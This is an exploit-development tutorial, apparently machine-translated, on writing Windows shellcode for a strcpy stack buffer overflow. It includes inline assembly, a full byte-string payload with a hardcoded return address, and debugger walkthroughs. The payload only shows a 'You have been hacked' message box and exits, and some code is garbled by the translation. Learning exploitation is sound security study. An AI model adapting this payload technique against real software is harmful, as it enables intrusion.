Buffer Overflow Analysis Lesson No. 04: Writing of Shellcode

Preface

What exactly is Shellcode, actually it is some compiled machine code, the machine code as data input, and then through the way we said before the implementation of Shellcode, which is the principle of buffer overflow utilization. So let's write Shellcode. For the sake of simplicity, I just want the program to display a dialog box:

Figure 1

get the address of the related functionso the next thing we do is let a program with a buffer overflow vulnerability display a dialog box. Since I want to call the MessageBox () This API function here, I need to get the address of the function first, which can be obtained by writing a small program:

#include <windows.h> #include <stdio.h>typedef void (*myproc) (LPTSTR); int main () {        hinstance Libhandle ;        MYPROC Procadd;        Libhandle = LoadLibrary ("user32");        Get the address of user32.dll        printf ("user32 = 0x%x\n", libhandle);        Get the address of MessageBoxA        procadd= (MYPROC) GetProcAddress (Libhandle, "MessageBoxA");        printf ("MessageBoxA = 0x%x\n", procadd);    GetChar ();        return 0;}

it displays the following results:

Figure 2

The result shows that the MessageBox in my system address is 0x77d507ea, of course, this address in different systems, should be different, so before you write Shellcode, be sure to find the address of the API function to call.

As we use the overflow operation to destroy the contents of the original stack space, this may cause the program to crash after our dialog box is displayed, so we need to use the ExitProcess () function to make the program terminate for the sake of caution. This function is located in the Kernel32.dll, so you can also use the above program to find the function address, as long as a slight modification can be:

Figure 3

Writing assembly Code

Next, you need to write code to execute, there are generally two ways to--c language writing and compilation, regardless of which way, the final need to convert to machine code. Here I prefer to write using the assembly. Please rest assured that, although it is a compilation, but in fact is very simple compilation, please do not have the fear of the mentality.

So before compiling the assembly code, I would like to start by telling you how to use assembly language to implement a function call.

As you may all know, in assembly language, to invoke a function, you need to use the call statement, and after the calling statement, you need to keep up with the address of the function in the system. Because I have just obtained the address of the MessageBox () and the ExitProcess () function, we can call the corresponding function here by calling the corresponding address. But in fact, when we are programming, we usually first assign the address to a register such as EAX, and then call the corresponding register, so as to achieve the invocation.

If the function we want to invoke also contains parameters, then we need to use the push statement to put the parameters into the stack separately from right to left before invoking the call statement. For example, now that there is a function (a,b,c), we want to invoke it, then its assembly code should be written as:

Push C

Push b

Push a

MOV eax,addressoffunction

Call EAX

According to this idea, we can use the inline assembly in VC + + to invoke the ExitProcess () function:

XOR ebx, EBX

Push EBX

mov eax, 0x7c81cafa

Call EAX

Next, write the MessageBox () function call. Unlike the previous function, this API function contains four parameters, of course, the first and fourth parameters, we can assign to 0 values, but the middle two parameters all contain a longer string, how to solve it? We might as well start by converting the strings we need into ASCII values:

Warning:

\x57\x61\x72\x6e\x69\x6e\x67

You have beenhacked! (by J.Y.) :

\x59\x6f\x75\x20\x68\x61\x76\x65\x20\x62\x65\x65\x6e\x20\x68\x61\x63\x6b\x65\x64\x21\x28\x62\x79\x20\x4a\x2e\ X59\x2e\x29

Each of the four characters is then grouped and populated with a space (\x20) of less than four characters:

Warning:

\x57\x61\x72\x6e

\x69\x6e\x67\x20

You have beenhacked! (by J.Y.) :

\x59\x6f\x75\x20

\x68\x61\x76\x65

\x20\x62\x65\x65

\x6e\x20\x68\x61

\x63\x6b\x65\x64

\x21\x28\x62\x79

\x20\x4a\x2e\x59

\x2e\x29\x20\x20

The reason why this needs to be populated with \x20 instead of \x00 is that we are now exploiting the strcpy vulnerability, and this function will not copy the \x00 after it has been found to be the end of our string as soon as we encounter \x00. So this is something that needs special attention.

Since our computer is a small-side display, the order of progression of the characters is from backward to forward, that is, the "Warning" in the Order of the stack:

Push 0x20676e69

Push 0x6e726157//push "Warning"

"You have beenhacked! (by J.Y.) " The stacking order is:

Push 0x2020292e

Push 0X592E4A20

Push 0x79622821

Push 0x64656b63

Push 0x6168206e

Push 0x65656220

Push 0x65766168

Push 0x20756f59//push "you have beenhacked! (by J.Y.) "

So here's the question, how do we get the addresses of the two strings so that they become the parameters of the MessageBox ()? In fact, this problem is not difficult, we can use the ESP pointer, because it always point to the top of the stack position, we put the character stack, the top position of the stack is the position of the characters we press, so after each character stack, you can add the following command:

mov eax,esp or mov ecx,esp

This is done, and then the function is called:

Push EBX

Push EAX

Push ECX

Push EBX

MOV Eax,0x77d507ea

Call EAX//Call MessageBox

Integrated above, the complete code is as follows:

int main () {_asm{sub esp,0x50xor ebx,ebxpush ebx   //Cut Stringpush 0x20676e69   push 0x6e726157    //Push " Warning "mov eax,esp                push ebx             //Cut Stringpush 0x2020292epush 0x592e4a20push 0x79622821push 0x64656b63push 0x6168206epush 0x65656220                Push 0x65766168push 0x20756f59    //Push "You have been hacked! ( by J.Y.) " mov ecx,esp        push ebxpush eaxpush ecxpush ebxmov eax,0x77d507eacall eax           //Call MessageBox                push ebx                mov E AX, 0x7c81cafa call                eax            //Call Exitprocess}return 0;}

Rewrite the assembly code to ShellcodeThen in the VC in the "_asm" position of the program first breakpoint, and then press F5 (GO), and then click "Disassembly", you can view the converted machine code (can also use OD or Ida view):

Figure 4

Extracting these machine codes is the ShellCode that we want the computer to perform. Then we'll take a look at what we said in the last lesson to write a complete shellcode:

Char name[] = "\x41\x41\x41\x41\x41\x41\x41\x41"//name[0]~name[7] "\x41\x41\x41\x41"//EBP "\x7                               9\x5b\xe3\x77 "//Return Address" \x83\xec\x50 "//Sub esp,0x50" \x33\xdb "  XOR ebx,ebx "\x53"//Push ebx "\x68\x69\x6e\x67\x20"                                   "\X68\X57\X61\X72\X6E"//Push "Warning" "\x8b\xc4"//mov Eax,esp "\x53" Push ebx "\x68\x2e\x29\x20\x20" "\x68\x20\x4a\x2e\x59" "\x68\x21\x28\x62\x79" "\x 68\x63\x6b\x65\x64 "" \x68\x6e\x20\x68\x61 "" \x68\x20\x62\x65\x65 "" \x68\x68\x61\x76\x65 "" \x68\x59\x6F\x75\x20 "//P Ush "You have been hacked! (by J.Y.) ""                                  \X8B\XCC "//mov Ecx,esp" \x53 "//Push ebx" \x50 "         push eax "\x51"//push ECX "\x53"                         Push ebx "\xb8\xea\x07\xd5\x77" "\xff\xd0"//CA ll MessageBox "\x53" "\xb8\xfa\xca\x81\x7c" "\x                             Ff\xd0 "; Call MessageBox

since we have called the MessageBox here, we need to add "LoadLibrary" ("User32.dll") to the source program; This statement is used to load the corresponding dynamic link library, and because of the use of LoadLibrary (), it is also necessary to add the header file "Windows.h". Then run the program and you can see that we have successfully exploited the vulnerability:

Figure 5

using OD to view the disassembly programFinally, you can look at the Od data as well as the stack area:

Figure 6

Here you can control it by yourself. Then we go to the return position of the main function and press F8 (step), and after the jump from jmp ESP, we are in the position of the shellcode we wrote:

Figure 7

At this point, we will look at the OD to see the MessageBox () parameter of this function into the stack. Perform the position to 0x0012ff98 first:

Figure 8

You can see that the "Warning" string is already in the stack, when ESP points to the stack frame, that is, the location of the "Warning" string, and when the value of the ESP is assigned to EAX, then it can be understood that the "Warning" string is saved in EAX.

The second string into the stack principle and this is the same, here no longer repeat. Then it is called the MessageBox () function:

Figure 9

You can see that the corresponding parameters are already in the stack, then the dialog box pops up, indicating that our exploit was successful.

SummaryIn fact, it's not that simple to write a complete shellcode, there are a lot of questions to consider. For example, this time we have written this simple ShellCode, can be perfected in a lot of places. As for the Shellcode, I will discuss it in detail in the next course.

Buffer Overflow Analysis Lesson No. 04: Writing of Shellcode